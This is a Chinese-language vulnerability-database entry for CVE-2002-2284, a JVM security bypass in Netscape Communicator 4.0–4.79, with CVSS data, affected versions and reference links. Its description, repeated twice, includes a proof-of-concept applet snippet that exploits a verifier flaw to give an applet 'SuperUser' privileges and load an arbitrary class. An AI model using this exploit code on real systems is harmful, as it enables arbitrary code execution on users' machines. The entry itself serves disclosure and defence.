CVE-2002-2284
CVSS6.4
发布时间 :2002-12-31 00:00:00
修订时间 :2016-10-17 22:28:00
NMCO    

[原文]Netscape Communicator 4.0 through 4.79 allows remote attackers to bypass JVM security and execute arbitrary Java code via an applet that loads user-supplied Java classes.


[CNNVD]Netscape Java虚拟机不安全调用漏洞(CNNVD-200212-443)

        
        Netscape Communicator/Navigator的JVM实现使用了Symantec Just In Time(JIT)编译器,Java虚拟机在共享动态实现,并默认被Netscape Browser使用。
        Netscape 4浏览器Java虚拟机实现由于部分方法被调用的时候不安全,远程攻击者可以利用这个漏洞构建恶意Java Applet,在JVM环境中装载恶意类而可能以高权限执行任意代码。
        构建如下applet代码运行在Netscape 4.x web浏览器中可以导致权限提升:
        PrivilegeManager pm=PrivilegeManager.getPrivilegeManager();
        VerifierBug bug=new VerifierBug();
        MyPrivilegeManager mpm=bug.cast2MyPrivilegeManager(pm);
        Target target=Target.findTarget("SuperUser");
        Privilege priv=Privilege.findPrivilege(Privilege.ALLOWED,Privilege.FOREVER);
        PrivilegeTable privtab=new PrivilegeTable();
        privtab.put(target,priv);
        Principal principal=PrivilegeManager.getMyPrincipals()[0];
        mpm.itsPrinToPrivTable.put(principal,privtab);
        try {
        ClassLoader cl=getClass().getClassLoader();
        Class c=cl.loadClass("Beyond");
        c.newInstance();
        } catch (Throwable e) {}
        获得Privilege Manager object引用指针的值并保存在pm变量中,然后可利用Netscape JVM中的一个缺陷结合其他漏洞提升权限。
        实际提升权限的攻击在如下代码中:
        Principal principal=PrivilegeManager.getMyPrincipals()[0];
        mpm.itsPrinToPrivTable.put(principal,privtab);
        首先,从PrivilegeManager类的Principal列表中获取一个Principal的引用,然后修改mpm的成员变量itsPrinToPrivTable,以给用户applet类增加新的权限信息。成员变量itsPrinToPrivTable是一个hash表,它保存了类的Principals和权限列表之间的关联信息。这样的修改结果,使得一个用户applet类的Principal与系统权限表关联起来。显然,在缺省情况下,applet类的Principals有一个空的权限表,这里,将它们与系统权限表关联起来。
        

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:netscape:communicator:4.5Netscape Communicator 4.5
cpe:/a:netscape:communicator:4.6Netscape Communicator 4.6
cpe:/a:netscape:communicator:4.7Netscape Communicator 4.7
cpe:/a:netscape:communicator:4.0Netscape Communicator 4.0
cpe:/a:netscape:communicator:4.61Netscape Communicator 4.61
cpe:/a:netscape:communicator:4.72Netscape Communicator 4.72
cpe:/a:netscape:communicator:4.74Netscape Communicator 4.74
cpe:/a:netscape:communicator:4.51Netscape Communicator 4.51
cpe:/a:netscape:communicator:4.73Netscape Communicator 4.73
cpe:/a:netscape:communicator:4.76Netscape Communicator 4.76
cpe:/a:netscape:communicator:4.75Netscape Communicator 4.75
cpe:/a:netscape:communicator:4.78Netscape Communicator 4.78
cpe:/a:netscape:communicator:4.77Netscape Communicator 4.77
cpe:/a:netscape:communicator:4.79Netscape Communicator 4.79

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2284
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2284
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-443
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=103798147613151&w=2
(UNKNOWN)  BUGTRAQ  20021121 [LSD] Java and JVM security vulnerabilities
http://www.lsd-pl.net/documents/javasecurity-1.0.0.pdf
(UNKNOWN)  MISC  http://www.lsd-pl.net/documents/javasecurity-1.0.0.pdf
http://www.securityfocus.com/bid/6223
(UNKNOWN)  BID  6223
http://xforce.iss.net/xforce/xfdb/10714
(UNKNOWN)  XF  netscape-java-insecure-classes(10714)

- 漏洞信息

Netscape Java虚拟机不安全调用漏洞
中危 设计错误
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        
        Netscape Communicator/Navigator的JVM实现使用了Symantec Just In Time(JIT)编译器,Java虚拟机在共享动态实现,并默认被Netscape Browser使用。
        Netscape 4浏览器Java虚拟机实现由于部分方法被调用的时候不安全,远程攻击者可以利用这个漏洞构建恶意Java Applet,在JVM环境中装载恶意类而可能以高权限执行任意代码。
        构建如下applet代码运行在Netscape 4.x web浏览器中可以导致权限提升:
        PrivilegeManager pm=PrivilegeManager.getPrivilegeManager();
        VerifierBug bug=new VerifierBug();
        MyPrivilegeManager mpm=bug.cast2MyPrivilegeManager(pm);
        Target target=Target.findTarget("SuperUser");
        Privilege priv=Privilege.findPrivilege(Privilege.ALLOWED,Privilege.FOREVER);
        PrivilegeTable privtab=new PrivilegeTable();
        privtab.put(target,priv);
        Principal principal=PrivilegeManager.getMyPrincipals()[0];
        mpm.itsPrinToPrivTable.put(principal,privtab);
        try {
        ClassLoader cl=getClass().getClassLoader();
        Class c=cl.loadClass("Beyond");
        c.newInstance();
        } catch (Throwable e) {}
        获得Privilege Manager object引用指针的值并保存在pm变量中,然后可利用Netscape JVM中的一个缺陷结合其他漏洞提升权限。
        实际提升权限的攻击在如下代码中:
        Principal principal=PrivilegeManager.getMyPrincipals()[0];
        mpm.itsPrinToPrivTable.put(principal,privtab);
        首先,从PrivilegeManager类的Principal列表中获取一个Principal的引用,然后修改mpm的成员变量itsPrinToPrivTable,以给用户applet类增加新的权限信息。成员变量itsPrinToPrivTable是一个hash表,它保存了类的Principals和权限列表之间的关联信息。这样的修改结果,使得一个用户applet类的Principal与系统权限表关联起来。显然,在缺省情况下,applet类的Principals有一个空的权限表,这里,将它们与系统权限表关联起来。
        

- 公告与补丁

        厂商补丁:
        Netscape
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.netscape.com

- 漏洞信息

60353
Netscape Communicator User-supplied Java Class JVM Security Bypass
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-11-21 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站